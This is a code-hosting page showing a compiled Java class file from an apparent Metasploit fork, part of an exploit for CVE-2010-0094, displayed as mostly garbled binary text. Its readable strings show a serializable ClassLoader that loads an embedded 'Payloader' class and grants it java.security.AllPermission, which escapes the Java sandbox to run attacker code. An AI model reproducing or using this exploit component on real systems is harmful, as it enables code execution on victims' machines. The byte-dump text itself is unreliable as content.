Files
metasploit-gs/data/exploits/cve-2010-0094/PayloadClassLoader.class
T

26 lines
2.8 KiB
Plaintext
Raw Normal View History

Êþº¾2PayloadClassLoaderjava/lang/ClassLoaderjava/io/SerializableserialVersionUIDJ
ConstantValueÚtX1? instanceLPayloadClassLoader;<clinit>()VCode 
LineNumberTableLocalVariableTable<init>
 this writeObject(Ljava/io/ObjectOutputStream;)V
Exceptionsjava/io/IOException java/lang/ClassNotFoundException
!#"java/io/ObjectOutputStream $defaultWriteObjectparamObjectOutputStreamLjava/io/ObjectOutputStream;
readObject(Ljava/io/ObjectInputStream;)V
*,+java/io/ObjectInputStream -defaultReadObjectparamObjectInputStreamLjava/io/ObjectInputStream;loadIt2 java/lang/InstantiationException4 java/lang/IllegalAccessException6java/io/ByteArrayOutputStream
5
9;:java/lang/Object <=getClass()Ljava/lang/Class;?/Payloader.class
ACBjava/lang/Class DEgetResourceAsStream)(Ljava/lang/String;)Ljava/io/InputStream;
5G HIwrite([BII)V
KMLjava/io/InputStream NOread([B)I
5Q RS toByteArray()[BU java/net/URLWfile:///
TY Z(Ljava/lang/String;)V\java/security/cert/Certificate^java/security/Permissions
]ajava/security/AllPermission
`
]d efadd(Ljava/security/Permission;)Vhjava/security/ProtectionDomainjjava/security/CodeSource
il m2(Ljava/net/URL;[Ljava/security/cert/Certificate;)V
go pA(Ljava/security/CodeSource;Ljava/security/PermissionCollection;)Vr Payloader
t uv defineClassI(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
Ax yz newInstance()Ljava/lang/Object; localObject1Ljava/io/ByteArrayOutputStream; localObject2[B localObject3Ljava/io/InputStream;jIlocalURLLjava/net/URL;
localClassLjava/lang/Class;arrayOfCertificate![Ljava/security/cert/Certificate;localPermissionsLjava/security/Permissions;localProtectionDomain Ljava/security/ProtectionDomain;
StackMapTable~
SourceFilePayloadClassLoader.java!